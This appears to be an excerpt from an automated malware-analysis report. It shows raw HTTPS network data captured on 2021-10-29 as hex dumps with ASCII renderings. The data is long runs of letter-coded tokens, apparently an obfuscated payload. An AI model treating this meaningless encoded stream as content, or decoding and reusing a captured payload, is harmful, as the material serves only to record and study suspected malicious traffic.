4f 20 4f 78 74 20 4f 4f
                                                                                                                          Data Ascii: OY OOK OOt Oxk kY EO YO ox oQ kO oQ oEt OxQ OOo YR Yx tE Yo kK OOK OOE oK oKE Yx Kk YO OQ OoO OOE kE tx OOt QE ORQ Yx YK QK OOo OK OOx OOo Yx Yo oE ot kR kK QY RQ oEK Yx Kk YR ok tk Qx Ro OxQ OOo Yo oR Yx KY Oxx OOQ OOt OtR OOE Yx Kk Kt YK kK QQ OO Oxt OO
                                                                                                                          2021-10-29 15:07:00 UTC1683INData Raw: 20 6f 4f 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 74 4b 20 4f 6b 20 6f 6f 6f 20 6b 74 20 4f 4f 4b 20 4f 4f 74 20 52 51 20 6f 45 51 20 59 78 20 4b 6b 20 59 52 20 4b 6b 20 52 51 20 4f 4f 51 20 4f 78 45 20 4f 78 74 20 45 4f 20 4f 4f 52 20 4b 6b 20 59 78 20 4b 6b 20 4f 6f 78 20 4f 74 4b 20 4f 6f 4b 20 45 78 20 4f 6b 78 20 59 78 20 4b 6b 20 59 6f 20 45 51 20 6b 6f 20 51 78 20 4f 74 51 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 51 59 20 4f 4b 74 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 78 6f 20 4f 78 6f 20 51 4f 20 6f 51 20 45 4b 20 59 74 20 45 78 20 6f 4b 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 51 20 52 6f 20 6f 74 20 4b 6f 20 4b 6b 20 59 51 20 52 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 45 4f 20 59 4b 20 52 59 20 4f 59 78 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 45 20
                                                                                                                          Data Ascii: oOE OxQ OOo YR tK Ok ooo kt OOK OOt RQ oEQ Yx Kk YR Kk RQ OOQ OxE Oxt EO OOR Kk Yx Kk Oox OtK OoK Ex Okx Yx Kk Yo EQ ko Qx OtQ OxQ OOo Yo QY OKt YK kK Oox Oxo Oxo QO oQ EK Yt Ex oKR OOK OOt OxE QQ Ro ot Ko Kk YQ RR OOt OxQ OOk EO YK RY OYx kK OOK Oot oE
                                                                                                                          2021-10-29 15:07:00 UTC1684INData Raw: 59 78 20 59 4b 20 52 59 20 4f 6b 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 6f 78 74 20 6b 59 20 4b 74 20 45 52 20 6f 78 4b 20 4b 6b 20 59 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 20 4f 74 51 20 4b 6b 20 59 78 20 4b 6b 20 6f 4b 52 20 6b 74 20 4f 78 74 20 4f 6f 4f 20 4f 4b 6f 20 59 6f 20 6b 4f 20 59 78 20 59 4b 20 6b 6f 20 4f 20 6f 4b 4b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4f 4b 52 20 6f 45 20 4b 4f 20 51 45 20 4f 78 6f 20 4f 45 51 20 4f 78 74 20 4f 6b 20 59 78 20 4b 6b 20 59 6f 20 52 51 20 6f 4f 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 6f 4f 78 20 6f 45 20 4b 74 20 59 52 20 45 4b 20 4f 74 78 20 4f 4f 52 20 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 52 74 20 4f 74 51 20 59 4b 20 6b 4b 20 4f 4f 52 20 6f 4f 59 20 74 6f 20 4f 4f 4f 20 59 74 20 45 52 20 6f 78
                                                                                                                          Data Ascii: Yx YK RY OkE kK OOK OOY oxt kY Kt ER oxK Kk Yo OOK OOt Oxt E OtQ Kk Yx Kk oKR kt Oxt OoO OKo Yo kO Yx YK ko O oKK OxQ OOo Yo OKR oE KO QE Oxo OEQ Oxt Ok Yx Kk Yo RQ oOE OOK OOt Oxt oOx oE Kt YR EK Otx OOR oo OxQ OOo Yo Rt OtQ YK kK OOR oOY to OOO Yt ER ox
                                                                                                                          2021-10-29 15:07:00 UTC1685INData Raw: 6b 74 20 52 20 4f 51 52 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 74 74 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 74 6f 20 45 20 4f 59 4b 20 4b 6b 20 59 78 20 52 78 20 59 51 20 6f 59 4f 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 6f 45 20 52 74 20 4b 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 6f 45 6b 20 4f 4f 45 20 59 78 20 59 4b 20 6f 45 20 52 51 20 6f 59 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 45 4f 20 4f 6b 45 20 4b 51 20 59 78 20 4b 6b 20 4f 4f 45 20 4f 20 6f 4f 78 20 4f 78 51 20 4f 4f 6f 20 59 52 20 51 59 20 52 59 20 59 59 20 6b 4b 20 4f 4f 52 20 6b 78 20 45 78 20 6f 4f 52 20 59 78 20 4b 6b 20 59 52 20 6b 51 20 6f 4f 4f 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 6b 59 20 52 59 20 4f 59 6f 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 6b 20 4f 78 6b 20 4f 4f 6f 20 59 6f
                                                                                                                          Data Ascii: kt R OQR OOo Yx Yk QE tt kY OOK OOY to E OYK Kk Yx Rx YQ oYO OOR OxQ OOk oE Rt K YK kK Oox oR oEk OOE Yx YK oE RQ oYo OOK OOt OxE EO OkE KQ Yx Kk OOE O oOx OxQ OOo YR QY RY YY kK OOR kx Ex oOR Yx Kk YR kQ oOO OOY OOt Oxt kY RY OYo Yx YK QK oQ k Oxk OOo Yo
                                                                                                                          2021-10-29 15:07:00 UTC1687INData Raw: 20 4f 4f 4b 20 4f 6f 74 20 52 59 20 74 78 20 59 6f 20 52 74 20 6b 52 20 59 4b 20 6b 4b 20 4f 6f 78 20 51 45 20 4f 51 6f 20 4f 4f 6f 20 59 78 20 59 6b 20 6f 52 20 4f 4f 52 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 6f 20 51 6b 20 59 4f 20 4b 74 20 6f 78 74 20 45 78 20 6f 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6b 6b 20 4f 59 52 20 4b 6b 20 59 78 20 52 78 20 4f 6f 78 20 51 51 20 4f 4f 59 20 52 51 20 6f 6f 45 20 59 78 20 4b 6b 20 59 52 20 4b 6b 20 4f 6f 4b 20 4f 51 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 78 20 45 6b 20 52 6f 20 6f 45 6f 20 52 4b 20 4f 78 4f 20 4f 6f 4f 20 4f 74 51 20 51 52 20 59 6f 20 6f 4b 20 4f 45 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6b 45 20 4f 6f 45 20 4f 6f 4b 20 6f 45 52 20 59 45 20 6f 78 20 6f 45 6f 20 6b 4b 20 4f 78 78 20 51 59
                                                                                                                          Data Ascii: OOK Oot RY tx Yo Rt kR YK kK Oox QE OQo OOo Yx Yk oR OOR kK OOK Oot Oxo Qk YO Kt oxt Ex oE OOK OOt OxE kk OYR Kk Yx Rx Oox QQ OOY RQ ooE Yx Kk YR Kk OoK OQK OOt OxQ Ooo ox Ek Ro oEo RK OxO OoO OtQ QR Yo oK OEx YK kK Oox kE OoE OoK oER YE ox oEo kK Oxx QY
                                                                                                                          2021-10-29 15:07:00 UTC1688INData Raw: 20 4f 78 51 20 4f 4f 4b 20 6f 52 20 4f 45 52 20 59 78 20 59 4b 20 51 4b 20 4f 78 4f 20 6f 4b 6b 20 6f 6f 4b 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 45 6f 20 52 52 20 4f 78 6f 20 51 45 20 6f 78 51 20 4f 4f 6f 20 59 78 20 59 6b 20 4f 4b 4b 20 45 78 20 6f 45 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6b 6b 20 4f 4b 78 20 4b 6b 20 59 78 20 52 78 20 6f 4f 6f 20 4f 4f 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 52 20 74 52 20 59 4b 20 59 4f 20 59 4b 20 6b 78 20 51 20 6f 78 6f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 74 6b 20 59 6f 20 59 59 20 6b 4b 20 4f 4f 6b 20 51 45 20 4f 51 4f 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 6f 4b 52 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 20 4f 74 74 20 59 78 20 4b 6b 20 59 52 20 45 78 20 6f 45 51 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 78
                                                                                                                          Data Ascii: OxQ OOK oR OER Yx YK QK OxO oKk ooK OOo Yx KQ oE Eo RR Oxo QE oxQ OOo Yx Yk OKK Ex oEE OOK OOt OxE kk OKx Kk Yx Rx oOo OOR OOR OxQ OOR tR YK YO YK kx Q oxo OxQ OOo YR tk Yo YY kK OOk QE OQO OOo Yx YK QE oKR kK OOK Oot o Ott Yx Kk YR Ex oEQ OOY OOt Oxt Qx
                                                                                                                          2021-10-29 15:07:00 UTC1689INData Raw: 20 59 78 20 4b 6b 20 4f 4f 45 20 4f 78 52 20 74 78 20 4f 78 4f 20 4f 4f 4b 20 4b 51 20 59 6f 20 6f 52 20 4f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 4f 52 20 52 74 20 59 6f 20 52 74 20 4f 59 45 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 59 20 74 4f 20 4f 51 6b 20 4b 6b 20 6f 4b 20 6f 4f 4f 20 59 4b 20 6b 4b 20 4f 4f 52 20 6b 78 20 52 4b 20 4f 4f 52 20 6f 78 20 45 52 20 6f 59 20 59 4f 20 4f 6f 4b 20 51 52 20 4f 4f 74 20 4f 78 51 20 51 4f 20 51 45 20 74 20 59 78 20 59 4b 20 6b 6f 20 6b 74 20 4f 78 51 20 51 4b 20 4f 6f 78 20 4b 6b 20 59 4f 20 59 4b 20 45 78 20 4f 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 4f 78 59 20 4f 20 59 4b 20 52 59 20 4f 59 74 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 45 20 51 78 20 4f 6b 78 20 59 78 20 6f 52 20 6f 4f 4b 20 6b 4b 20 4f 4f 4b
                                                                                                                          Data Ascii: Yx Kk OOE OxR tx OxO OOK KQ Yo oR Oxk kK OOK OOY OOR Rt Yo Rt OYE YK kK Oox OY tO OQk Kk oK oOO YK kK OOR kx RK OOR ox ER oY YO OoK QR OOt OxQ QO QE t Yx YK ko kt OxQ QK Oox Kk YO YK Ex OY OOK OOt Oxt OxY O YK RY OYt kK OOK Oot oE Qx Okx Yx oR oOK kK OOK
                                                                                                                          2021-10-29 15:07:00 UTC1691INData Raw: 74 20 52 74 20 59 6b 20 59 78 20 4b 51 20 59 78 20 4f 6f 4b 20 4f 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 4b 45 20 45 20 59 6f 20 52 51 20 6f 59 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 4f 78 20 6f 4b 20 4b 6b 20 45 45 20 52 20 6b 78 20 4f 4f 4b 20 6f 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 78 20 59 78 20 59 4b 20 52 51 20 4f 4f 45 20 6f 52 20 59 6b 20 4f 4f 45 20 59 78 20 59 4b 20 45 78 20 51 74 20 45 51 20 6f 45 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 59 52 20 59 4b 20 4b 51 20 6b 51 20 4b 51 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 45 4f 20 4f 52 52 20 4b 6b 20 59 78 20 4b 6b 20 74 52 20 6f 59 59 20 51 4b 20 4f 78 51 20 4f 4f 6f 20 4b 6b 20 6f 4f 20 45 52 20 52 51 20 4f 51 51 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 6f 4f 78 20 6f 45 20 45 51 20 59
                                                                                                                          Data Ascii: t Rt Yk Yx KQ Yx OoK OR OOt OxQ OOk KE E Yo RQ oYY OOK OOt OxE Ox oK Kk EE R kx OOK oO OxQ OOo Yx ox Yx YK RQ OOE oR Yk OOE Yx YK Ex Qt EQ oEO OOt OxQ OOk YR YK KQ kQ KQ OOY OOt Oxt EO ORR Kk Yx Kk tR oYY QK OxQ OOo Kk oO ER RQ OQQ OOK OOt Oxt oOx oE EQ Y
                                                                                                                          2021-10-29 15:07:00 UTC1692INData Raw: 78 74 20 6b 59 20 4b 45 20 45 52 20 6f 78 4b 20 4b 6b 20 45 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 20 4f 74 51 20 4b 6b 20 59 78 20 4b 6b 20 6f 4b 52 20 6b 74 20 4f 4f 4f 20 4f 6f 4f 20 4f 4b 6f 20 59 6f 20 74 78 20 59 78 20 59 4b 20 6b 6f 20 4f 20 6f 4b 4b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4f 4b 52 20 6f 45 20 4b 59 20 52 4b 20 4f 4b 78 20 4f 4f 59 20 6f 52 20 4f 4f 6f 20 59 78 20 59 4b 20 52 59 20 4f 6b 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 6f 78 74 20 6b 59 20 4b 52 20 45 52 20 6f 78 4b 20 4b 6b 20 4b 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 20 4f 74 51 20 4b 6b 20 59 78 20 4b 6b 20 6f 4b 52 20 6b 74 20 4f 78 4b 20 4f 6f 4f 20 4f 4b 6f 20 59 6f 20 74 4b 20 59 78 20 59 4b 20 6b 6f 20 4f 20 6f 4b 4b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4f 4b
                                                                                                                          Data Ascii: xt kY KE ER oxK Kk EE OOK OOt Oxt E OtQ Kk Yx Kk oKR kt OOO OoO OKo Yo tx Yx YK ko O oKK OxQ OOo Yo OKR oE KY RK OKx OOY oR OOo Yx YK RY OkE kK OOK OOY oxt kY KR ER oxK Kk KY OOK OOt Oxt E OtQ Kk Yx Kk oKR kt OxK OoO OKo Yo tK Yx YK ko O oKK OxQ OOo Yo OK
                                                                                                                          2021-10-29 15:07:00 UTC1693INData Raw: 20 52 59 20 4f 4b 59 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 20 45 4f 20 59 4f 20 4b 6b 20 59 6f 20 4f 51 20 45 51 20 4f 78 74 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 51 45 20 74 4f 20 59 4f 20 59 4b 20 6b 6f 20 6b 74 20 52 20 51 4f 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 74 51 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 74 6f 20 45 20 4f 59 4b 20 4b 6b 20 59 78 20 52 78 20 59 51 20 6f 4b 51 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 6f 45 20 52 74 20 4f 59 4b 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 6b 20 4f 4f 45 20 59 78 20 59 4b 20 6f 45 20 52 51 20 6f 59 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 45 4f 20 74 45 20 4b 51 20 59 78 20 4b 6b 20 4f 4f 45 20 4f 20 6f 6f 4f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 51 59 20 4f 6b 74 20 59 59 20 6b 4b 20 4f 4f 52 20 6b 78
                                                                                                                          Data Ascii: RY OKY kK OOK Oot o EO YO Kk Yo OQ EQ Oxt OOt OxQ Ooo QE tO YO YK ko kt R QO OOo Yx Yk QE tQ kY OOK OOY to E OYK Kk Yx Rx YQ oKQ OOR OxQ OOk oE Rt OYK YK kK Oox oR Ok OOE Yx YK oE RQ oYE OOK OOt OxE EO tE KQ Yx Kk OOE O ooO OxQ OOo YR QY Okt YY kK OOR kx
                                                                                                                          2021-10-29 15:07:00 UTC1695INData Raw: 20 51 4b 20 78 20 4f 45 20 4f 78 4f 20 4f 4f 6f 20 52 52 20 6f 4b 20 4f 4f 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 6f 74 20 4f 78 74 20 6b 6b 20 4f 59 6b 20 4b 6b 20 59 78 20 52 78 20 4f 6f 78 20 52 6b 20 4f 4f 59 20 45 78 20 6f 78 20 59 78 20 4b 6b 20 59 52 20 45 78 20 6f 4b 51 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6b 6b 20 4f 4f 6f 20 4b 6b 20 59 78 20 52 78 20 51 59 20 51 52 20 4f 4f 52 20 4f 4f 4b 20 4f 4b 4f 20 6f 52 20 4f 4f 59 20 59 78 20 59 4b 20 51 4b 20 51 78 20 6f 4f 51 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 6b 20 45 59 20 4b 6b 20 4f 6f 4b 20 6f 6f 4f 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 59 6f 20 6f 4b 20 4f 45 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6b 45 20 4f 6f 45 20 4f 6f 4b 20 6f 45 52 20 45 52 20 45 74 20 59 6b 20 4f 45 6b 20 51 6b 20 4f 4f
                                                                                                                          Data Ascii: QK x OE OxO OOo RR oK OO YK kK Oox Oot Oxt kk OYk Kk Yx Rx Oox Rk OOY Ex ox Yx Kk YR Ex oKQ OOK OOt OxE kk OOo Kk Yx Rx QY QR OOR OOK OKO oR OOY Yx YK QK Qx oOQ OxQ OOo YR ok EY Kk OoK ooO OOt OxQ Ooo Yo oK OEx YK kK Oox kE OoE OoK oER ER Et Yk OEk Qk OO
                                                                                                                          2021-10-29 15:07:00 UTC1696INData Raw: 6f 20 51 4b 20 4f 4f 59 20 4f 4f 74 20 4f 78 59 20 4f 4b 20 59 52 20 4b 51 20 59 78 20 59 78 20 4b 74 20 6f 78 4f 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 74 52 20 59 6b 20 59 4f 20 59 4b 20 6b 78 20 4f 6f 20 4f 6f 4b 20 4f 78 6b 20 4f 4f 6f 20 59 4b 20 6f 51 20 6f 20 45 6f 20 45 6b 20 6f 6f 6b 20 4f 6f 59 20 4f 78 51 20 78 20 45 6b 20 6f 6f 4b 20 52 45 20 59 4b 20 6b 4b 20 4f 4f 6f 20 51 45 20 6f 4f 45 20 4f 4f 6f 20 59 78 20 59 6b 20 45 74 20 4f 6b 74 20 6f 4f 74 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 45 52 20 45 6b 20 45 6b 20 45 78 20 6f 45 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6f 4f 78 20 6f 52 20 4f 4b 4f 20 59 78 20 59 4b 20 51 4b 20 51 78 20 6f 78 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 4f 74 52 20 59 51 20 59 59 20 6b 4b 20 4f 4f 6b 20
                                                                                                                          Data Ascii: o QK OOY OOt OxY OK YR KQ Yx Yx Kt oxO OOt OxQ Ooo tR Yk YO YK kx Oo OoK Oxk OOo YK oQ o Eo Ek ook OoY OxQ x Ek ooK RE YK kK OOo QE oOE OOo Yx Yk Et Okt oOt OOK OOt Oxk kY ER Ek Ek Ex oEo OOK OOt OxE oOx oR OKO Yx YK QK Qx oxE OxQ OOo YR OtR YQ YY kK OOk
                                                                                                                          2021-10-29 15:07:00 UTC1697INData Raw: 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 6f 52 20 6f 4f 4f 20 59 78 20 59 4b 20 6b 6f 20 6f 51 20 4b 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 6f 52 20 52 6b 20 59 78 20 4f 6f 4b 20 6f 78 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 6f 52 20 6f 78 51 20 59 78 20 59 4b 20 6b 6f 20 6b 74 20 6b 6b 20 4f 78 59 20 6b 52 20 45 6b 20 6f 74 20 59 59 20 45 78 20 74 78 20 4f 4f 4b 20 4f 4f 74 20 74 78 20 45 4f 20 51 59 20 4b 51 20 59 78 20 4b 6b 20 4f 6f 52 20 59 6f 20 4f 4f 45 20 52 51 20 6f 78 4b 20 59 4f 20 4b 6b 20 59 6f 20 45 78 20 4f 6b 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 4f 20 52 59 20 4b 51 20 59 78 20 4b 6b 20 4f 6f 52 20 59 6f 20 4f 4f 45 20 52 51 20 6f 78 4b 20 59 4f 20 4b 6b 20 59 6f 20 45 78 20 4f 74 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 4f 20 51
                                                                                                                          Data Ascii: OOR OxQ OOk oR oOO Yx YK ko oQ K Oxk OOo Yo oR Rk Yx OoK oxR OOR OxQ OOk oR oxQ Yx YK ko kt kk OxY kR Ek ot YY Ex tx OOK OOt tx EO QY KQ Yx Kk OoR Yo OOE RQ oxK YO Kk Yo Ex Okx OOK OOt Oxt EO RY KQ Yx Kk OoR Yo OOE RQ oxK YO Kk Yo Ex OtR OOK OOt Oxt EO Q
                                                                                                                          2021-10-29 15:07:00 UTC1701INData Raw: 51 4b 20 74 6f 20 4b 4f 20 4f 4b 52 20 4f 4b 45 20 6f 78 59 20 6f 45 6b 20 52 6f 20 45 51 20 6b 78 20 51 4b 20 4f 4f 4b 20 4f 6f 4b 20 4f 4f 52 20 51 45 20 59 51 20 59 78 20 59 4b 20 51 4b 20 4f 74 4b 20 4f 74 4f 20 4f 4f 78 20 6b 52 20 6f 45 52 20 4b 6b 20 59 6b 20 45 45 20 4f 6f 20 4f 6f 52 20 4f 6f 59 20 4f 78 52 20 6f 59 4b 20 51 4f 20 4f 59 20 6f 78 20 6f 78 4f 20 4f 74 4f 20 4f 4b 4f 20 4f 74 4f 20 4f 4f 78 20 6b 52 20 6f 45 52 20 4b 6b 20 59 6f 20 6f 6b 20 6b 59 20 59 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6b 4f 20 59 78 20 4f 4f 6f 20 6f 4b 45 20 4f 4f 4b 20 4f 4f 6b 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 59 78 20 59 4b 20 4f 6f 6f 20 4f 4f 4b 20 6f 4b 51 20 6f 4f 59 20 4f 4f 6f 20 4b 51 20 59 6b 20 59 78 20 59 4b 20 6b 59 20 4f 4f
                                                                                                                          Data Ascii: QK to KO OKR OKE oxY oEk Ro EQ kx QK OOK OoK OOR QE YQ Yx YK QK OtK OtO OOx kR oER Kk Yk EE Oo OoR OoY OxR oYK QO OY ox oxO OtO OKO OtO OOx kR oER Kk Yo ok kY Yx OOt OxQ OOo Yx kO Yx OOo oKE OOK OOk Qk OOo Yx KQ Yx YK Ooo OOK oKQ oOY OOo KQ Yk Yx YK kY OO
                                                                                                                          2021-10-29 15:07:00 UTC1706INData Raw: 20 74 20 4f 6f 4b 20 51 74 20 51 45 20 4f 51 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 6b 4f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 45 51 20 4f 51 4f 20 4f 4f 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 74 6f 20 4f 78 6f 20 4b 6f 20 4f 6b 51 20 4f 78 4b 20 59 4b 20 6b 4b 20 4f 4f 59 20 6b 78 20 4f 6f 45 20 4f 4f 4f 20 6b 20 4f 74 45 20 6f 45 20 45 45 20 74 59 20 4b 52 20 6f 45 6f 20 45 78 20 74 6f 20 59 78 20 4b 6b 20 59 52 20 4f 4b 6b 20 52 74 20 6f 51 20 59 51 20 4f 78 51 20 4f 4f 6f 20 59 52 20 45 59 20 45 6f 20 4b 6b 20 52 51 20 51 51 20 6f 52 20 74 45 20 4f 4f 6f 20 59 78 20 59 6b 20 52 59 20 4f 74 78 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 74 6f 20 51 74 20 45 6f 20 6f 6b 20 59 45 20 45 51 20 74 78 20 6f 59 6f 20 6f 6b 20 4f 6f 6f 20 52 4b 20 59 45 20 74 6b 20 4b
                                                                                                                          Data Ascii: t OoK Qt QE OQ Yx YK QK oQ kO OxQ OOo YR EQ OQO OOx kK OOK OOR to Oxo Ko OkQ OxK YK kK OOY kx OoE OOO k OtE oE EE tY KR oEo Ex to Yx Kk YR OKk Rt oQ YQ OxQ OOo YR EY Eo Kk RQ QQ oR tE OOo Yx Yk RY Otx kY OOK OOY to Qt Eo ok YE EQ tx oYo ok Ooo RK YE tk K
                                                                                                                          2021-10-29 15:07:00 UTC1710INData Raw: 20 4f 78 51 20 78 20 51 45 20 4f 51 4b 20 59 78 20 59 4b 20 6b 6f 20 6b 74 20 51 51 20 6f 20 4f 45 6f 20 59 78 20 4b 6b 20 59 6f 20 6b 51 20 4f 45 51 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 6b 20 4b 6b 20 6f 4b 20 74 20 59 4b 20 6b 4b 20 4f 6f 78 20 74 51 20 59 6b 20 4f 4b 45 20 6f 78 59 20 6f 78 74 20 6f 45 52 20 59 52 20 74 78 20 4f 4f 6f 20 4f 45 51 20 4f 6f 45 20 4f 6f 78 20 59 78 20 4b 6b 20 4b 4f 20 6b 51 20 51 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 4f 74 6f 20 6f 45 52 20 59 4f 20 6f 78 20 6f 45 6f 20 6b 4b 20 4f 74 6f 20 4f 4f 6b 20 74 59 20 4f 74 4b 20 59 78 20 59 4b 20 6f 4b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 59 6f 20 45 45 20 4f 4f 6f 20 59 78 20 59 78 20 59 78 20 59 4b 20 6b 4b 20 4f 59 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 45 78 20
                                                                                                                          Data Ascii: OxQ x QE OQK Yx YK ko kt QQ o OEo Yx Kk Yo kQ OEQ OOK OOt OxE Qk Kk oK t YK kK Oox tQ Yk OKE oxY oxt oER YR tx OOo OEQ OoE Oox Yx Kk KO kQ QY OOK OOt OxE Oto oER YO ox oEo kK Oto OOk tY OtK Yx YK oK YK kK OOK Yo EE OOo Yx Yx Yx YK kK OYE OOt OxQ OOo OEx
                                                                                                                          2021-10-29 15:07:00 UTC1714INData Raw: 20 4f 4f 6b 20 52 4b 20 59 45 20 4b 6b 20 4f 45 74 20 59 4b 20 6b 4b 20 4f 4f 4b 20 51 4f 20 4f 78 51 20 4f 4f 6f 20 45 59 20 4b 74 20 52 4f 20 4f 6b 74 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 6f 4f 59 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 6f 74 20 4f 78 59 20 45 4f 20 4f 74 20 4b 6b 20 59 78 20 52 78 20 51 59 20 4f 6f 20 4f 78 74 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 78 20 59 45 20 6b 51 20 4b 51 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 4f 78 74 20 4f 51 4f 20 4f 78 52 20 59 78 20 59 4b 20 6b 59 20 6b 74 20 4f 52 59 20 4f 74 45 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 4f 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 45 78 20 74 6f 20 59 78 20
                                                                                                                          Data Ascii: OOk RK YE Kk OEt YK kK OOK QO OxQ OOo EY Kt RO Okt OK OOK OOt Oxk kY ooR oOY Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox Oot OxY EO Ot Kk Yx Rx QY Oo Oxt OxQ OOo YR Rx YE kQ KQ OOK OOt OxE Oxt OQO OxR Yx YK kY kt ORY OtE OOo Yx Yo oR O kK OOK Oot Ex to Yx
                                                                                                                          2021-10-29 15:07:00 UTC1718INData Raw: 59 4b 20 51 4b 20 51 4b 20 4f 78 6b 20 4f 4f 45 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 6f 78 4f 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 59 52 20 6f 45 6f 20 51 59 20 4f 74 6f 20 4f 4f 6b 20 74 59 20 4f 74 4b 20 59 78 20 74 6b 20 4b 4b 20 59 4b 20 6b 4b 20 4f 6f 78 20 51 59 20 4f 78 74 20 51 78 20 59 78 20 4b 6b 20 59 78 20 59 59 20 52 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 6f 20 6b 20 6b 4b 20 4f 4f 45 20 4f 6f 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 4b 45 20 6f 20 4b 6b 20 6b 4b 20 51 6b 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20 45 20 4b 6b 20 59 78 20 45 51 20 45 51 20 4f 74 4b 20 4f 4f 74 20 4f 78
                                                                                                                          Data Ascii: YK QK QK Oxk OOE oYE OxK Kk Yx YY OOE ORo oxO OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk YR oEo QY Oto OOk tY OtK Yx tk KK YK kK Oox QY Oxt Qx Yx Kk Yx YY Rk OOK OOt OxQ OOo Yx Kk Oo k kK OOE Oot OxQ OOo YO KE o Kk kK Qk OOR OxQ OOo E Kk Yx EQ EQ OtK OOt Ox
